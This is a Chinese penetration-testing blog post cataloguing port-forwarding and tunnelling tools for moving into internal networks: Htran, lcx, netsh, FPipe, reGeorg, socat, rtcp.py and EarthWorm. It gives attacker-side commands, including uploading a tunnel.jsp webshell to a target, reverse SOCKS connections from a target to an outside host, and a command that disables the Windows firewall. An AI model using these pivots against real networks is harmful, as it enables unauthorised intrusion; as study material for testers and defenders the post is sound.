<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script> 
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">













<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico?v=6.5.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="Htranhttps://github.com/zcnhonker/HTran 正向端口转发服务端 htran.exe -tran 8888 192.168.1.1 3389 客户端 nc 服务端IP:8888 反向端口转发攻击机 htran.exe -listen 1234 8888 服务端 htran.exe -slave 攻击机IP 1234 127.0.0.1 3389 客户端 nc 12">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透——端口转发工具">
<meta property="og:url" content="http://yoursite.com/2018/12/02/内网渗透——端口转发工具/index.html">
<meta property="og:site_name" content="guolala&#39;s blog">
<meta property="og:description" content="Htranhttps://github.com/zcnhonker/HTran 正向端口转发服务端 htran.exe -tran 8888 192.168.1.1 3389 客户端 nc 服务端IP:8888 反向端口转发攻击机 htran.exe -listen 1234 8888 服务端 htran.exe -slave 攻击机IP 1234 127.0.0.1 3389 客户端 nc 12">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvndm38r7j30az0cgwel.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvnr1ny05j30m10dbdhi.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvo6upd14j30ds0fn413.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvoaevsydj30ds0fmmzn.jpg">
<meta property="og:updated_time" content="2018-12-05T03:55:30.999Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网渗透——端口转发工具">
<meta name="twitter:description" content="Htranhttps://github.com/zcnhonker/HTran 正向端口转发服务端 htran.exe -tran 8888 192.168.1.1 3389 客户端 nc 服务端IP:8888 反向端口转发攻击机 htran.exe -listen 1234 8888 服务端 htran.exe -slave 攻击机IP 1234 127.0.0.1 3389 客户端 nc 12">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvndm38r7j30az0cgwel.jpg">



  <link rel="alternate" href="/atom.xml" title="guolala's blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2018/12/02/内网渗透——端口转发工具/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>内网渗透——端口转发工具 | guolala's blog</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">guolala's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">情迷不意乱</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/12/02/内网渗透——端口转发工具/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="guolala">
      <meta itemprop="description" content="growing up">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guolala's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">内网渗透——端口转发工具
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-12-02 20:29:02" itemprop="dateCreated datePublished" datetime="2018-12-02T20:29:02+08:00">2018-12-02</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2018-12-05 11:55:30" itemprop="dateModified" datetime="2018-12-05T11:55:30+08:00">2018-12-05</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/内网渗透工具/" itemprop="url" rel="index"><span itemprop="name">内网渗透工具</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Htran"><a href="#Htran" class="headerlink" title="Htran"></a>Htran</h2><p><a href="https://github.com/zcnhonker/HTran" target="_blank" rel="noopener">https://github.com/zcnhonker/HTran</a></p>
<h3 id="正向端口转发"><a href="#正向端口转发" class="headerlink" title="正向端口转发"></a>正向端口转发</h3><pre><code>服务端 htran.exe -tran 8888 192.168.1.1 3389
客户端 nc 服务端IP:8888
</code></pre><h3 id="反向端口转发"><a href="#反向端口转发" class="headerlink" title="反向端口转发"></a>反向端口转发</h3><pre><code>攻击机 htran.exe -listen 1234 8888
服务端 htran.exe -slave 攻击机IP 1234 127.0.0.1 3389
客户端 nc 127.0.0.1：8888
</code></pre><h2 id="lcx"><a href="#lcx" class="headerlink" title="lcx"></a>lcx</h2><p><a href="https://guolala.top/2018/12/04/nc%E5%91%BD%E4%BB%A4%E4%BD%BF%E7%94%A8/" target="_blank" rel="noopener">https://guolala.top/2018/12/04/nc%E5%91%BD%E4%BB%A4%E4%BD%BF%E7%94%A8/</a></p>
<h2 id="Netsh"><a href="#Netsh" class="headerlink" title="Netsh"></a>Netsh</h2><p>netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具</p>
<p>Ipv4地址，转发本地8001端口到192.168.1.1的80端口</p>
<pre><code>netsh interface portproxy add v4tov4 listenport=8001 connectport=80

connectaddress=192.168.1.1
</code></pre><p>删除转发规则</p>
<pre><code>netsh interface portproxy delete v4tov4 listenport=9090查看现有规则

netsh interface portproxy show all
</code></pre><p>查看防火墙状态</p>
<pre><code>netsh firewall show state 
netsh firewall set opmode disable 关闭防火墙
netsh firewall set opmode enable 启用防火墙
</code></pre><h2 id="Fpipe"><a href="#Fpipe" class="headerlink" title="Fpipe"></a>Fpipe</h2><p>FPipe 是一款命令行下的端口映射工具，可以映射 TCP/UDP 协议，支持连接数的最大上限.</p>
<p>转发本地1080端口到远程的52345端口：</p>
<pre><code>FPipe.exe -l 1080 -r 52345 192.168.1.1 -v
</code></pre><h2 id="socks代理"><a href="#socks代理" class="headerlink" title="socks代理"></a>socks代理</h2><p>Socks代理相对端口转发更万便一些</p>
<h3 id="reGeorg"><a href="#reGeorg" class="headerlink" title="reGeorg"></a>reGeorg</h3><h4 id="windows下"><a href="#windows下" class="headerlink" title="windows下"></a>windows下</h4><p><a href="https://github.com/sensepost/reGeorg.git" target="_blank" rel="noopener">https://github.com/sensepost/reGeorg.git</a></p>
<p>这款工具的主要特点是服务端通常是一些web应用，例如php、aspx脚本。这样在目标仅仅开启了web服务的情况下我们也能做一个正向的socks代理。</p>
<p>它利用webshell建立一个socks代理进行内网穿透。</p>
<p>使用reGeorg需要安装setuptools（windows）和ez_setup.py（linux）</p>
<p><a href="https://pypi.python.org/pypi/setuptools#windows-simplified" target="_blank" rel="noopener">https://pypi.python.org/pypi/setuptools#windows-simplified</a></p>
<p><a href="https://bootstrap.pypa.io/ez_setup.py" target="_blank" rel="noopener">https://bootstrap.pypa.io/ez_setup.py</a></p>
<p>将setuptools 复制到 C:\Python27\（复制到python安装根目录）<br>在命令提示符下切换到C:\Python27\，依次运行如下命令。</p>
<pre><code>python  setup.py  build
python  setup.py  install
</code></pre><p>setuptools包含了pip，可直接用pip安装urllib3模块。<br>命令提示符下切换到C:\Python27\Scripts，<br>直接运行<code>pip  install  urllib3</code></p>
<p>reGeorg工具安装完成。</p>
<p><strong>使用参数</strong></p>
<ul>
<li>-h 帮助</li>
<li>-l 监听地址</li>
<li>-p 转发端口</li>
<li>-r 本地缓冲区，最大发送数据</li>
<li>-u 上传reGeorg脚本的地址</li>
<li>-v 详细显示</li>
</ul>
<p>使用方法：</p>
<p>将下载内容的tunnel.jsp压缩（看网站），通过weblogic（各种文件上传）上传至服务器。</p>
<p>本地建立一个socks代理</p>
<p>切换到C:\Python27\，运行:</p>
<pre><code>python reGeorgSocksProxy.py -p 2333 -u http://192.168.209.159:7001/tunnel/tunnel.jsp
</code></pre><p>再用proxifier配置服务器</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvndm38r7j30az0cgwel.jpg" alt=""></p>
<p>将python.exe添加列外，不然会死循环。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvnr1ny05j30m10dbdhi.jpg" alt=""></p>
<blockquote>
<p>reGeorg在设计初，并未考虑Java中间件的问题，测试结果暂时支持Tomcat，所以如果服务器是Weblogic等中间件时候，可能会造成暂时无法访问3389远程桌面，或者卡在远程桌面</p>
</blockquote>
<h4 id="kali下使用代理"><a href="#kali下使用代理" class="headerlink" title="kali下使用代理"></a>kali下使用代理</h4><pre><code>vi proxychains.conf        //编辑配置文件
dynamic_chain            //取消此注释
socks5 127.0.0.1 7070    //添加代理
proxychains firefox
proxychains nmap -vvv -n -sT -PN -p 80 192.168.0.1-255
</code></pre><h2 id="rtcp-py"><a href="#rtcp-py" class="headerlink" title="rtcp.py"></a>rtcp.py</h2><p>利用 Python 的 Socket 端口转发，用于远程维护</p>
<p>如果连接不到远程，会 sleep 36s，最多尝试 200 次（即两小时）</p>
<p><a href="https://github.com/knownsec/rtcp" target="_blank" rel="noopener">https://github.com/knownsec/rtcp</a></p>
<p>用法：</p>
<ul>
<li>./rtcp.py stream1 stream2</li>
<li>stream 为：l:port 或 c:host:port</li>
<li><code>l</code>:port 表示监听指定的本地端口</li>
<li><code>c</code>:host:port 表示监听远程指定的端口</li>
</ul>
<p>转发本地8080端口到192.168.1.1的80端口</p>
<pre><code>/rtcp.py 1:8080 c:192.168.1.1:80
</code></pre><p><strong>使用场景：</strong></p>
<p>A 服务器在内网，公网无法直接访问这台服务器，但是 A 服务器可以联网访问公网的 B 服务器（假设 IP 为 222.2.2.2）</p>
<p>我们也可以访问公网的 B 服务器。我们的目标是访问 A 服务器的 22 端口。那么可以这样：</p>
<ul>
<li>在 B 服务器上运行：./rtcp.py l:10001 l:10002</li>
</ul>
<blockquote>
<p>表示在本地监听了 10001 与 10002 两个端口，这样，这两个端口就可以互相传输数据了</p>
</blockquote>
<ul>
<li>在 A 服务器上运行：./rtcp.py c:localhost:22 c:222.2.2.2:10001</li>
</ul>
<blockquote>
<p>表示连接本地的 22 端口与 B 服务器的 10001 端口，这两个端口也可以互相传输数据了</p>
</blockquote>
<ul>
<li>然后我们就可以这样来访问 A 服务器的 22 端口了：ssh -p 10002 222.2.2.2</li>
</ul>
<blockquote>
<p>原理很简单，这个命令执行后，B 服务器的 10002 端口接收到的任何数据都会传给 10001 端口</p>
</blockquote>
<blockquote>
<p>此时，A 服务器是连接了 B 服务器的 10001 端口的，数据就会传给 A 服务器，最终进入 A 服务器的 22 端口</p>
</blockquote>
<h2 id="ssh-putty转发"><a href="#ssh-putty转发" class="headerlink" title="ssh+putty转发"></a>ssh+putty转发</h2><p>先安装：</p>
<pre><code>apt-get install putty
</code></pre><p>打开putty，配置SSH</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvo6upd14j30ds0fn413.jpg" alt=""></p>
<p>配置SSH隧道</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fxvoaevsydj30ds0fmmzn.jpg" alt=""></p>
<p>连接SSH并登录，保持窗口不关闭</p>
<p>访问8888端口——&gt;7001端口。</p>
<h2 id="socat转发"><a href="#socat转发" class="headerlink" title="socat转发"></a>socat转发</h2><p>安装socat</p>
<pre><code>apt-get install socat
</code></pre><p>添加转发规则</p>
<pre><code>socat TCP4-LISTEN:7777,reuseaddr,fork TCP4:192.168.0.92:7001
</code></pre><p>访问7777——&gt;7001.</p>
<h2 id="Earthworm：跨平台内网穿透神器"><a href="#Earthworm：跨平台内网穿透神器" class="headerlink" title="Earthworm：跨平台内网穿透神器"></a>Earthworm：跨平台内网穿透神器</h2><p>基于标准C开发，具有socks5代理、端口转发和端口映射三大功能。</p>
<p>支持多平台，可穿透复杂的内网环境</p>
<p><a href="https://github.com/rootkiter/EarthWorm" target="_blank" rel="noopener">https://github.com/rootkiter/EarthWorm</a></p>
<p><strong>使用方法：</strong></p>
<ul>
<li>-h 查看帮助</li>
<li>-s 指定链路状态(<code>ssocksd</code>、<code>rcsocks</code>、<code>rssocks</code>、<code>lcx_slave</code>、<code>lcx_listen</code>、 <code>lcx_tran</code>)</li>
<li>ssocksd：正向socks5代理连接;</li>
<li>rcsocks、rssocks：反向socks5代理连接;</li>
<li><code>lcx_slave</code>、<code>lcx_listen</code>：端口转发;</li>
<li><code>lcx_tran</code>：端口映射</li>
<li>-l 开放指定端口监听</li>
<li>-d 指定转发或反弹的主机地址</li>
<li>-e 指定转发或反弹的主机端口</li>
<li>-f 指定连接或映射的主机地址</li>
<li>-g 指定连接或映射的主机端口</li>
<li>-t 设置超时时间，默认为10000毫秒，即10秒(单位毫秒，-h显示有误)；</li>
<li>-v 显示版本；</li>
<li>-a 显示关于页面；</li>
</ul>
<h3 id="正向socks5代理-适用于目标拥有公网ip且可任意开监听端口"><a href="#正向socks5代理-适用于目标拥有公网ip且可任意开监听端口" class="headerlink" title="正向socks5代理(适用于目标拥有公网ip且可任意开监听端口)"></a>正向socks5代理(适用于目标拥有公网ip且可任意开监听端口)</h3><pre><code>ew_for_Win.exe -s ssocksd -l 1080
</code></pre><p>在公网主机1.1.1.1上运行并开启端口为1080的socks5代理。</p>
<p>通过proxifier等代理工具访问1.1.1.1:1080使用1.1.1.1主机提供的socks5代理服务.</p>
<h3 id="反向socks5代理-适用于目标无公网ip但可访问外网-："><a href="#反向socks5代理-适用于目标无公网ip但可访问外网-：" class="headerlink" title="反向socks5代理(适用于目标无公网ip但可访问外网)："></a>反向socks5代理(适用于目标无公网ip但可访问外网)：</h3><p>先在一台具有公网 ip 的主机A上运行以下命令：</p>
<p>在公网主机上添加转接隧道，将1080端口收到的代理请求转交给反弹到8888端口的主机。</p>
<pre><code>相通机器：ew_for_Win.exe -s rcsocks -l 1080 -e 8888
</code></pre><blockquote>
<p>将rcsocks改成<code>lcx_listen也</code>同样有效</p>
</blockquote>
<p>在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口：</p>
<p>在目标主机上开启socks5代理并反向连接到公网主机1.1.1.1的8888端口上。</p>
<pre><code>目标主机：ew_for_Win.exe -s rssocks -d 1.1.1.1 -e 8888
</code></pre><p>通过proxifier等代理工具访问1.1.1.1:1080使用rssocks主机提供的socks5代理服务。</p>
<h3 id="多级级联"><a href="#多级级联" class="headerlink" title="多级级联"></a>多级级联</h3><p><code>lcx_slave</code>、<code>lcx_listen</code>、<code>lcx_tran</code>用法跟lcx一样。</p>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/02/文件包含漏洞详解/" rel="next" title="文件包含漏洞详解">
                <i class="fa fa-chevron-left"></i> 文件包含漏洞详解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/03/搜索引擎——永不过时的渗透神器/" rel="prev" title="搜索引擎——永不过时的渗透神器">
                搜索引擎——永不过时的渗透神器 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="guolala">
            
              <p class="site-author-name" itemprop="name">guolala</p>
              <p class="site-description motion-element" itemprop="description">growing up</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">47</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/6791921870/" title="Weibo &rarr; https://weibo.com/6791921870/" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Htran"><span class="nav-number">1.</span> <span class="nav-text">Htran</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#正向端口转发"><span class="nav-number">1.1.</span> <span class="nav-text">正向端口转发</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反向端口转发"><span class="nav-number">1.2.</span> <span class="nav-text">反向端口转发</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lcx"><span class="nav-number">2.</span> <span class="nav-text">lcx</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Netsh"><span class="nav-number">3.</span> <span class="nav-text">Netsh</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Fpipe"><span class="nav-number">4.</span> <span class="nav-text">Fpipe</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#socks代理"><span class="nav-number">5.</span> <span class="nav-text">socks代理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#reGeorg"><span class="nav-number">5.1.</span> <span class="nav-text">reGeorg</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#windows下"><span class="nav-number">5.1.1.</span> <span class="nav-text">windows下</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#kali下使用代理"><span class="nav-number">5.1.2.</span> <span class="nav-text">kali下使用代理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#rtcp-py"><span class="nav-number">6.</span> <span class="nav-text">rtcp.py</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ssh-putty转发"><span class="nav-number">7.</span> <span class="nav-text">ssh+putty转发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#socat转发"><span class="nav-number">8.</span> <span class="nav-text">socat转发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Earthworm：跨平台内网穿透神器"><span class="nav-number">9.</span> <span class="nav-text">Earthworm：跨平台内网穿透神器</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#正向socks5代理-适用于目标拥有公网ip且可任意开监听端口"><span class="nav-number">9.1.</span> <span class="nav-text">正向socks5代理(适用于目标拥有公网ip且可任意开监听端口)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反向socks5代理-适用于目标无公网ip但可访问外网-："><span class="nav-number">9.2.</span> <span class="nav-text">反向socks5代理(适用于目标无公网ip但可访问外网)：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#多级级联"><span class="nav-number">9.3.</span> <span class="nav-text">多级级联</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart" id="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guolala</span>

  

  
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.5.0</div>


-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
  </script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
        
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="true"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
